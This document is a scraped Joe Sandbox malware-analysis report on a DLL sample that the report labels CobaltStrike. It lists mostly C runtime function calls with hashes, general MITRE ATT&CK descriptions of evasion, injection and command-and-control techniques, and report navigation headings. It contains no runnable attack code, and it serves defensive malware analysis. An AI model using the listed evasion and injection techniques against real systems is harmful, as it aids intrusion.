Part of subcall function 00967E78: __decode_pointer.LIBCMT ref: 00967E83

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
String ID:
API String ID: 3240763771-0
Opcode ID: 4f33f4342aa81be682ee8529de8ddf7a9f1dcf969045443942705e403fed9378
Instruction ID: 6efee52ecca6b41e3ad79e62de3e245903b958f8f5952ad15ffdd7ac74e1f01c
Opcode Fuzzy Hash: 4f33f4342aa81be682ee8529de8ddf7a9f1dcf969045443942705e403fed9378
Instruction Fuzzy Hash: DB41F431A01608EFDB25DFE9C89059EB7BAEF81360F248529E4A597280D738EE41DF40

Uniqueness

Uniqueness Score: -1.00%

Function 0095259B Relevance: 6.1, APIs: 4, Instructions: 127COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00952652
_memset.LIBCMT ref: 00952661
_memset.LIBCMT ref: 00952692
_memset.LIBCMT ref: 009526D3

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID: _memset$_malloc
String ID:
API String ID: 3506388080-0
Opcode ID: 2f92d887f2d134bd95751f297887a598e42eebdff739c37b0882c938ca475765
Instruction ID: 9b82dbfa81a7887dfd0a17757585543602b309b3eb8402254f13ea71a8346be6
Opcode Fuzzy Hash: 2f92d887f2d134bd95751f297887a598e42eebdff739c37b0882c938ca475765
Instruction Fuzzy Hash: 51418BB6504108BEEB10ABA6DC46FBF77BCEF49746F000465FA04E5091EB35898ADB35

Uniqueness

Uniqueness Score: -1.00%

Function 00957B20 Relevance: 6.1, APIs: 4, Instructions: 84COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00957B2D

Part of subcall function 009641C7: __FF_MSGBANNER.LIBCMT ref: 009641EA
Part of subcall function 009641C7: __NMSG_WRITE.LIBCMT ref: 009641F1
Part of subcall function 009641C7: RtlAllocateHeap.NTDLL(00000000,?,?,00004008,009865EC,?,0095006E,00004008), ref: 0096423E

__snprintf.LIBCMT ref: 00957B3E

Part of subcall function 009640EA: __lock.LIBCMT ref: 00964108
Part of subcall function 009640EA: ___sbh_find_block.LIBCMT ref: 00964113
Part of subcall function 009640EA: ___sbh_free_block.LIBCMT ref: 00964122
Part of subcall function 009640EA: RtlFreeHeap.NTDLL(00000000,?,0097E5C8,0000000C,00965FC4,00000000,0097E728,0000000C,00965FFE,?,?,?,0096F821,00000004,0097EA88,0000000C), ref: 00964152

_malloc.LIBCMT ref: 00957B8A
__snprintf.LIBCMT ref: 00957B9F

Part of subcall function 00957AE3: _malloc.LIBCMT ref: 00957AEE
Part of subcall function 00957AE3: __snprintf.LIBCMT ref: 00957B02

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID: __snprintf_malloc$Heap$AllocateFree___sbh_find_block___sbh_free_block__lock
String ID:
API String ID: 4161344415-0
Opcode ID: c8c6b3293334bb382d3faaf71b05c466dc3e49b72d67cfda6a27c0f61f07f4fc
Instruction ID: 43eb054e8e1e62d7e15f2e25e4f93c52962751b96a76ca9ec1c2c3dd0b3aaaf0
Opcode Fuzzy Hash: c8c6b3293334bb382d3faaf71b05c466dc3e49b72d67cfda6a27c0f61f07f4fc
Instruction Fuzzy Hash: C721C572504208BBDF209FA29C46FAF7B6DEF81365F148428FC0866151DB719E51AB60

Uniqueness

Uniqueness Score: -1.00%

Function 0095013A Relevance: 6.1, APIs: 4, Instructions: 71COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 0095014F

Part of subcall function 009641C7: __FF_MSGBANNER.LIBCMT ref: 009641EA
Part of subcall function 009641C7: __NMSG_WRITE.LIBCMT ref: 009641F1
Part of subcall function 009641C7: RtlAllocateHeap.NTDLL(00000000,?,?,00004008,009865EC,?,0095006E,00004008), ref: 0096423E

_memset.LIBCMT ref: 009501A4
_memset.LIBCMT ref: 009501B3
_memset.LIBCMT ref: 009501CA

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID: _memset$AllocateHeap_malloc
String ID:
API String ID: 1114209484-0
Opcode ID: 22f3c3891bce931a9dc319434fc9fc930d6ca07cbc7726e236a8a0b8d9551c46
Instruction ID: 294a340803925ada46f1e5e36d28e835b4021fde07c11cbe3444380eadf4955c
Opcode Fuzzy Hash: 22f3c3891bce931a9dc319434fc9fc930d6ca07cbc7726e236a8a0b8d9551c46
Instruction Fuzzy Hash: EF1138716085457AC7109A768CC1BBABB6EDFD3365F100464FC48C7242E3229D08C3A1

Uniqueness

Uniqueness Score: -1.00%

Function 00959AD5 Relevance: 6.1, APIs: 4, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

_malloc.LIBCMT ref: 00959AF7
_strncpy.LIBCMT ref: 00959B17
_strtok.LIBCMT ref: 00959B2F
_strtok.LIBCMT ref: 00959B4F

Part of subcall function 009657BD: __getptd.LIBCMT ref: 009657DB

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID: _strtok$__getptd_malloc_strncpy
String ID:
API String ID: 4272429445-0
Opcode ID: 0ace3528247c038aaf92b704caa31bf6923abbd2253e2e07697b6bb62e1c92e1
Instruction ID: 9d03904d7b484a5d2db95477eb27479817180d01ec65367daa7fad92342dcb81
Opcode Fuzzy Hash: 0ace3528247c038aaf92b704caa31bf6923abbd2253e2e07697b6bb62e1c92e1
Instruction Fuzzy Hash: FB11B435428601DFFB14DF75FC557623B68EB063A5F100129F8168B3A2EB72A419DB50

Uniqueness

Uniqueness Score: -1.00%

Function 009597C8 Relevance: 6.1, APIs: 4, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

_memset.LIBCMT ref: 0095982A
_memset.LIBCMT ref: 0095983E
_memset.LIBCMT ref: 0095984F
_memset.LIBCMT ref: 00959858

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: ed311939cc9a49e2de4e6a82aa761562895308bf8390fcf2868e974f03cadcdc
Instruction ID: e29ff51b236c585035f485837ada7b99b11c808eaedce3458ad1ff50d97287a4
Opcode Fuzzy Hash: ed311939cc9a49e2de4e6a82aa761562895308bf8390fcf2868e974f03cadcdc
Instruction Fuzzy Hash: 6301C8B1100204BADB10AB73DC85FAF3B6DEF863A1F014425FE099A143E7759854D7B1

Uniqueness

Uniqueness Score: -1.00%

Function 0095AA08 Relevance: 6.0, APIs: 4, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

_clock.LIBCMT ref: 0095AA24
_clock.LIBCMT ref: 0095AA32
_clock.LIBCMT ref: 0095AA3C
_clock.LIBCMT ref: 0095AA4A

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID: _clock
String ID:
API String ID: 876827150-0
Opcode ID: c918077cbdba4abde34237b4b82c4e35b187e0ff10ad7a8b9c4aa903bd7d21b7
Instruction ID: 0043c882f19371fb376c5101d263bf2209c91e3074131e2f2adad7a02a0f3b3f
Opcode Fuzzy Hash: c918077cbdba4abde34237b4b82c4e35b187e0ff10ad7a8b9c4aa903bd7d21b7
Instruction Fuzzy Hash: D901B531D01218EF8F14DFEAD6C06ADBBB4EF40341F1085BAD801A7112E7704E48CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 00959A3A Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE

Download Yara Rule

APIs

_strtok.LIBCMT ref: 00959A4F

Part of subcall function 009657BD: __getptd.LIBCMT ref: 009657DB

Part of subcall function 009640EA: __lock.LIBCMT ref: 00964108
Part of subcall function 009640EA: ___sbh_find_block.LIBCMT ref: 00964113
Part of subcall function 009640EA: ___sbh_free_block.LIBCMT ref: 00964122
Part of subcall function 009640EA: RtlFreeHeap.NTDLL(00000000,?,0097E5C8,0000000C,00965FC4,00000000,0097E728,0000000C,00965FFE,?,?,?,0096F821,00000004,0097EA88,0000000C), ref: 00964152

_malloc.LIBCMT ref: 00959A78
_strncpy.LIBCMT ref: 00959A98
_strtok.LIBCMT ref: 00959AA4

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID: _strtok$FreeHeap___sbh_find_block___sbh_free_block__getptd__lock_malloc_strncpy
String ID:
API String ID: 1186450272-0
Opcode ID: f4931b00e1ed2066776054199b060665feacecb6eae59564b405c9a02be8afa7
Instruction ID: 72de12ce343a68ac3d57184614f8e2899fd6403087c373164ed968c07c1d9f45
Opcode Fuzzy Hash: f4931b00e1ed2066776054199b060665feacecb6eae59564b405c9a02be8afa7
Instruction Fuzzy Hash: 72017D3A108141EAEB19AFB9FC4EF723F7DCB82314F000119F9498B623DA6399198760

Uniqueness

Uniqueness Score: -1.00%

Function 00950795 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

_vwprintf.LIBCMT ref: 009507A0

Part of subcall function 0096459D: __vscwprintf_helper.LIBCMT ref: 009645AF

_malloc.LIBCMT ref: 009507B3

Part of subcall function 009641C7: __FF_MSGBANNER.LIBCMT ref: 009641EA
Part of subcall function 009641C7: __NMSG_WRITE.LIBCMT ref: 009641F1
Part of subcall function 009641C7: RtlAllocateHeap.NTDLL(00000000,?,?,00004008,009865EC,?,0095006E,00004008), ref: 0096423E

_vswprintf_s.LIBCMT ref: 009507C7

Part of subcall function 00964529: __vsprintf_s_l.LIBCMT ref: 0096453C

_memset.LIBCMT ref: 009507DA

Part of subcall function 009640EA: __lock.LIBCMT ref: 00964108
Part of subcall function 009640EA: ___sbh_find_block.LIBCMT ref: 00964113
Part of subcall function 009640EA: ___sbh_free_block.LIBCMT ref: 00964122
Part of subcall function 009640EA: RtlFreeHeap.NTDLL(00000000,?,0097E5C8,0000000C,00965FC4,00000000,0097E728,0000000C,00965FFE,?,?,?,0096F821,00000004,0097EA88,0000000C), ref: 00964152

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID: Heap$AllocateFree___sbh_find_block___sbh_free_block__lock__vscwprintf_helper__vsprintf_s_l_malloc_memset_vswprintf_s_vwprintf
String ID:
API String ID: 1977744246-0
Opcode ID: 96a5ed3c0dd55f7cfbfddd9eb4e8d96f2ba4d250db9e810305b68227fd5609e6
Instruction ID: 2c1a23ae733f73da75dffb79b0bd409ff5669852381029c396f22d25e7d84433
Opcode Fuzzy Hash: 96a5ed3c0dd55f7cfbfddd9eb4e8d96f2ba4d250db9e810305b68227fd5609e6
Instruction Fuzzy Hash: 8CF0BE7B0042197BDB11AEA4DC82FFF3B6CEFCA7A0F10051AF91995041EB21A91497B1

Uniqueness

Uniqueness Score: -1.00%

Function 00950794 Relevance: 6.0, APIs: 4, Instructions: 41COMMON

Download Yara Rule

APIs

_vwprintf.LIBCMT ref: 009507A0

Part of subcall function 0096459D: __vscwprintf_helper.LIBCMT ref: 009645AF

_malloc.LIBCMT ref: 009507B3

Part of subcall function 009641C7: __FF_MSGBANNER.LIBCMT ref: 009641EA
Part of subcall function 009641C7: __NMSG_WRITE.LIBCMT ref: 009641F1
Part of subcall function 009641C7: RtlAllocateHeap.NTDLL(00000000,?,?,00004008,009865EC,?,0095006E,00004008), ref: 0096423E

_vswprintf_s.LIBCMT ref: 009507C7

Part of subcall function 00964529: __vsprintf_s_l.LIBCMT ref: 0096453C

_memset.LIBCMT ref: 009507DA

Part of subcall function 009640EA: __lock.LIBCMT ref: 00964108
Part of subcall function 009640EA: ___sbh_find_block.LIBCMT ref: 00964113
Part of subcall function 009640EA: ___sbh_free_block.LIBCMT ref: 00964122
Part of subcall function 009640EA: RtlFreeHeap.NTDLL(00000000,?,0097E5C8,0000000C,00965FC4,00000000,0097E728,0000000C,00965FFE,?,?,?,0096F821,00000004,0097EA88,0000000C), ref: 00964152

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID: Heap$AllocateFree___sbh_find_block___sbh_free_block__lock__vscwprintf_helper__vsprintf_s_l_malloc_memset_vswprintf_s_vwprintf
String ID:
API String ID: 1977744246-0
Opcode ID: 7ee31a83bf9f20864b059d91c61b01c1c6536ebbba28342f5dae6b1c7adca133
Instruction ID: f5a7541e4a7d9200a49a54eaec1f38496a68b4d57203ac9e95216a4a7c884f11
Opcode Fuzzy Hash: 7ee31a83bf9f20864b059d91c61b01c1c6536ebbba28342f5dae6b1c7adca133
Instruction Fuzzy Hash: F1F09A7B0001197ADB21AEA4AC82FFF3B6CEFCA3A0F10051AF91995041DB21A91597A1

Uniqueness

Uniqueness Score: -1.00%

Function 0096D94D Relevance: 6.0, APIs: 4, Instructions: 31COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0096D959

Part of subcall function 00969035: __getptd_noexit.LIBCMT ref: 00969038
Part of subcall function 00969035: __amsg_exit.LIBCMT ref: 00969045

__getptd.LIBCMT ref: 0096D970
__amsg_exit.LIBCMT ref: 0096D97E
__lock.LIBCMT ref: 0096D98E

Memory Dump Source

Source File: 00000000.00000002.620024884.0000000000950000.00000020.00001000.00020000.00000000.sdmp, Offset: 00950000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_950000_loaddll32.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$__getptd_noexit__lock
String ID:
API String ID: 3521780317-0
Opcode ID: a3383de9500bab577348895872582840ecbd2d2477fc8516d0add761e85874c3
Instruction ID: bc9002ee9289eb4d26e59fc83ee8e076795d956139040995cb847dc0adfb6a8a
Opcode Fuzzy Hash: a3383de9500bab577348895872582840ecbd2d2477fc8516d0add761e85874c3
Instruction Fuzzy Hash: 3FF0B432F167048BD760BFB4C40275D73A46F80714F404649E464A72D1CF346A019B51

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 8082-x86.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: CobaltStrike

Yara Signatures

Initial Sample

Memory Dumps

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Imports

Exports

Network Behavior

Network Port Distribution

TCP Packets

HTTP Request Dependency Graph

HTTP Packets

Statistics

CPU Usage

Memory Usage

High Level Behavior Distribution

back

Windows Analysis Report
8082-x86.dll

Function 00951449 Relevance: 12.2, APIs: 8, Instructions: 169
networkfileCOMMONLIBRARYCODE

Function 009578FB Relevance: 4.7, APIs: 3, Instructions: 155
COMMONLIBRARYCODE

Function 009558DD Relevance: 4.6, APIs: 3, Instructions: 123
COMMONLIBRARYCODE

Function 00951207 Relevance: 12.1, APIs: 8, Instructions: 147
networkCOMMONLIBRARYCODE

Function 0095031C Relevance: 7.8, APIs: 5, Instructions: 271
COMMONLIBRARYCODE

Function 0095A007 Relevance: 7.6, APIs: 5, Instructions: 70
COMMONLIBRARYCODE

Function 00959684 Relevance: 6.1, APIs: 4, Instructions: 115
COMMONLIBRARYCODE

Function 009640EA Relevance: 6.0, APIs: 4, Instructions: 44
memoryCOMMONLIBRARYCODE

Function 009516C7 Relevance: 4.6, APIs: 3, Instructions: 66
networkCOMMONLIBRARYCODE

Function 00955B90 Relevance: 4.5, APIs: 3, Instructions: 35
COMMONLIBRARYCODE

Function 00955A34 Relevance: 3.1, APIs: 2, Instructions: 124
COMMONLIBRARYCODE

Function 00950FE6 Relevance: 3.1, APIs: 2, Instructions: 114
networkCOMMONLIBRARYCODE

Function 00950000 Relevance: 3.1, APIs: 2, Instructions: 62
COMMONLIBRARYCODE

Function 0095C7D5 Relevance: 1.8, APIs: 1, Instructions: 257
COMMONLIBRARYCODE

Function 009590C6 Relevance: 1.6, APIs: 1, Instructions: 145
COMMONLIBRARYCODE